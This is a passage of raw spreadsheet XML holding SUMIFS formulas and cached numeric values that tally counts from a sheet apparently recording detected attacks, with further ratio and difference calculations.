        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA8)</f>
        <v>11</v>
      </c>
      <c r="BB9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB8)</f>
        <v>3297</v>
      </c>
      <c r="BC9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC8)</f>
        <v>6615</v>
      </c>
      <c r="BD9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD8)</f>
        <v>0</v>
      </c>
      <c r="BE9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE8)</f>
        <v>0</v>
      </c>
      <c r="BF9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF8)</f>
        <v>200</v>
      </c>
      <c r="BG9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG8)</f>
        <v>0</v>
      </c>
      <c r="BH9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH8)</f>
        <v>6</v>
      </c>
      <c r="BI9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI8)</f>
        <v>2</v>
      </c>
      <c r="BJ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ8)</f>
        <v>0</v>
      </c>
      <c r="BK9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK8)</f>
        <v>1</v>
      </c>
      <c r="BL9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL8)</f>
        <v>7</v>
      </c>
      <c r="BM9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM8)</f>
        <v>0</v>
      </c>
      <c r="BN9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN8)</f>
        <v>147</v>
      </c>
      <c r="BO9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO8)</f>
        <v>266</v>
      </c>
      <c r="BP9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP8)</f>
        <v>0</v>
      </c>
      <c r="BQ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ8)</f>
        <v>3</v>
      </c>
      <c r="BR9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR8)</f>
        <v>2</v>
      </c>
      <c r="BS9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS8)</f>
        <v>1</v>
      </c>
      <c r="BT9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT8)</f>
        <v>0</v>
      </c>
      <c r="BU9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU8)</f>
        <v>2</v>
      </c>
      <c r="BV9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV8)</f>
        <v>1</v>
      </c>
      <c r="BW9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW8)</f>
        <v>15</v>
      </c>
      <c r="BX9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX8)</f>
        <v>88</v>
      </c>
      <c r="BY9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY8)</f>
        <v>2</v>
      </c>
      <c r="BZ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ8)</f>
        <v>12</v>
      </c>
      <c r="CA9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA8)</f>
        <v>0</v>
      </c>
      <c r="CB9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB8)</f>
        <v>188</v>
      </c>
      <c r="CC9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC8)</f>
        <v>1</v>
      </c>
      <c r="CD9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD8)</f>
        <v>27</v>
      </c>
      <c r="CE9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE8)</f>
        <v>113</v>
      </c>
      <c r="CF9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF8)</f>
        <v>7</v>
      </c>
      <c r="CG9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG8)</f>
        <v>0</v>
      </c>
      <c r="CH9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH8)</f>
        <v>65841</v>
      </c>
      <c r="CI9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI8)</f>
        <v>1002</v>
      </c>
      <c r="CJ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ8)</f>
        <v>0</v>
      </c>
      <c r="CK9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK8)</f>
        <v>13</v>
      </c>
      <c r="CL9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL8)</f>
        <v>0</v>
      </c>
      <c r="CM9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM8)</f>
        <v>2</v>
      </c>
      <c r="CN9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN8)</f>
        <v>10</v>
      </c>
      <c r="CO9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO8)</f>
        <v>0</v>
      </c>
      <c r="CP9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP8)</f>
        <v>0</v>
      </c>
      <c r="CQ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ8)</f>
        <v>0</v>
      </c>
      <c r="CR9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR8)</f>
        <v>0</v>
      </c>
      <c r="CS9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS8)</f>
        <v>76</v>
      </c>
      <c r="CT9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT8)</f>
        <v>2</v>
      </c>
      <c r="CU9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU8)</f>
        <v>26</v>
      </c>
      <c r="CV9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV8)</f>
        <v>0</v>
      </c>
      <c r="CW9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW8)</f>
        <v>911</v>
      </c>
      <c r="CX9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX8)</f>
        <v>116</v>
      </c>
      <c r="CY9" s="603">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY8)</f>
        <v>17</v>
      </c>
      <c r="CZ9" s="173"/>
      <c r="DA9" s="173"/>
      <c r="DB9" s="173"/>
      <c r="DC9" s="604" t="s">
        <v>2093</v>
      </c>
      <c r="DD9" s="605">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC9,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>14</v>
      </c>
      <c r="DE9" s="606">
        <v>14.0</v>
      </c>
      <c r="DF9" s="336">
        <f t="shared" ref="DF9:DF12" si="1">DE9/DD9</f>
        <v>1</v>
      </c>
      <c r="DG9" s="173">
        <f t="shared" ref="DG9:DG12" si="2">DD9-DE9</f>
        <v>0</v>
      </c>
      <c r="DH9" s="337">
        <f t="shared" ref="DH9:DH12" si="3">1-DF9</f>
        <v>0</v>
      </c>
      <c r="DI9" s="607">
        <f t="shared" ref="DI9:DI23" si="4">DD9</f>
        <v>14</v>
      </c>
      <c r="DJ9" s="608">
        <f t="shared" ref="DJ9:DJ12" si="5">DI9/DD9</f>
        <v>1</v>
      </c>
      <c r="DK9" s="609">
        <f t="shared" ref="DK9:DK12" si="6">DD9-DI9</f>
        <v>0</v>
      </c>
      <c r="DL9" s="455">
        <f t="shared" ref="DL9:DL12" si="7">DK9/DD9</f>
        <v>0</v>
      </c>
      <c r="DM9" s="610"/>
      <c r="DN9" s="610"/>
      <c r="DO9" s="611" t="s">
        <v>2093</v>
      </c>
      <c r="DP9" s="612">
        <f>DD9/'(D) - Análisis Resultados I - S'!EB28</f>
        <v>2.8</v>
      </c>
      <c r="DQ9" s="173"/>
      <c r="DR9" s="611" t="s">
        <v>2093</v>
      </c>
      <c r="DS9" s="612">
        <f t="shared" ref="DS9:DS12" si="8">DE9/DD9</f>
        <v>1</v>
      </c>
      <c r="DT9" s="173"/>
      <c r="DU9" s="173"/>
      <c r="DV9" s="173"/>
      <c r="DW9" s="595" t="s">
        <v>2465</v>
      </c>
      <c r="DX9" s="613"/>
      <c r="DY9" s="614">
        <f>SQRT(DY7*(1-DY8))</f>
        <v>0.1266318107</v>
      </c>
      <c r="DZ9" s="173"/>
      <c r="EC9" s="173"/>
      <c r="ED9" s="403" t="s">
        <v>2650</v>
      </c>
      <c r="EE9" s="403" t="s">
        <v>2651</v>
      </c>
      <c r="EF9" s="403" t="s">
        <v>2652</v>
      </c>
      <c r="EG9" s="403" t="s">
        <v>2653</v>
      </c>
      <c r="EH9" s="173"/>
      <c r="EI9" s="173"/>
      <c r="EJ9" s="173"/>
      <c r="EK9" s="173"/>
      <c r="EL9" s="173"/>
      <c r="EM9" s="615"/>
      <c r="EN9" s="173"/>
      <c r="EO9" s="379" t="s">
        <v>2448</v>
      </c>
      <c r="EP9" s="401" t="s">
        <v>2654</v>
      </c>
      <c r="EQ9" s="401" t="s">
        <v>2655</v>
      </c>
      <c r="ER9" s="401" t="s">
        <v>2656</v>
      </c>
      <c r="ES9" s="401"/>
      <c r="ET9" s="402"/>
      <c r="EV9" s="173"/>
      <c r="EW9" s="173"/>
      <c r="EX9" s="173"/>
      <c r="EY9" s="173"/>
      <c r="EZ9" s="173"/>
      <c r="FA9" s="173"/>
      <c r="FB9" s="173"/>
      <c r="FC9" s="173"/>
      <c r="FD9" s="173"/>
      <c r="FE9" s="173"/>
      <c r="FF9" s="173"/>
      <c r="FG9" s="173"/>
      <c r="FH9" s="173"/>
      <c r="FI9" s="173"/>
      <c r="FJ9" s="173"/>
      <c r="FK9" s="173"/>
      <c r="FN9" s="173"/>
      <c r="FO9" s="173"/>
      <c r="FP9" s="173"/>
      <c r="FQ9" s="173"/>
      <c r="FR9" s="173"/>
      <c r="FS9" s="173"/>
      <c r="FT9" s="173"/>
      <c r="FU9" s="173"/>
      <c r="FV9" s="173"/>
      <c r="FW9" s="173"/>
      <c r="FX9" s="173"/>
    </row>
    <row r="10">
      <c r="D10" s="434"/>
      <c r="E10" s="354"/>
      <c r="F10" s="377"/>
      <c r="G10" s="352" t="s">
        <v>2464</v>
      </c>
      <c r="H10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,H8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; H8 &amp; "*") </f>
        <v>9388</v>
      </c>
      <c r="I10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,I8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; I8 &amp; "*") </f>
        <v>6951</v>
      </c>
      <c r="J10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,J8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; J8 &amp; "*") </f>
        <v>124</v>
      </c>
      <c r="K10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,K8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; K8 &amp; "*") </f>
        <v>12</v>
      </c>
      <c r="L10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,L8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; L8 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="M10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,M8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; M8 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="N10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,N8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; N8 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="O10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,O8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; O8 &amp; "*") </f>
        <v>8473</v>
      </c>
      <c r="P10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,P8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; P8 &amp; "*") </f>
        <v>146</v>
      </c>
      <c r="Q10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Q8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Q8 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="R10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,R8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; R8 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="S10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S8 &amp; "*") </f>
        <v>66843</v>
      </c>
      <c r="T10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T8 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="U10" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U8 &amp; "*") </f>
        <v>574</v>
      </c>
      <c r="W10" s="352" t="s">
        <v>2464</v>
      </c>
      <c r="X10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,X8)</f>
        <v>9384</v>
      </c>
      <c r="Y10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Y8)</f>
        <v>1</v>
      </c>
      <c r="Z10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Z8)</f>
        <v>2</v>
      </c>
      <c r="AA10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AA8)</f>
        <v>1</v>
      </c>
      <c r="AB10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AB8)</f>
        <v>6951</v>
      </c>
      <c r="AC10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AC8)</f>
        <v>0</v>
      </c>
      <c r="AD10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AD8)</f>
        <v>0</v>
      </c>
      <c r="AE10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AE8)</f>
        <v>0</v>
      </c>
      <c r="AF10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AF8)</f>
        <v>114</v>
      </c>
      <c r="AG10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AG8)</f>
        <v>4</v>
      </c>
      <c r="AH10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AH8)</f>
        <v>0</v>
      </c>
      <c r="AI10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI8)</f>
        <v>1</v>
      </c>
      <c r="AJ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ8)</f>
        <v>2</v>
      </c>
      <c r="AK10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK8)</f>
        <v>3</v>
      </c>
      <c r="AL10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL8)</f>
        <v>0</v>
      </c>
      <c r="AM10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM8)</f>
        <v>9</v>
      </c>
      <c r="AN10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN8)</f>
        <v>0</v>
      </c>
      <c r="AO10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO8)</f>
        <v>2</v>
      </c>
      <c r="AP10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP8)</f>
        <v>1</v>
      </c>
      <c r="AQ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ8)</f>
        <v>0</v>
      </c>
      <c r="AR10" s="173">
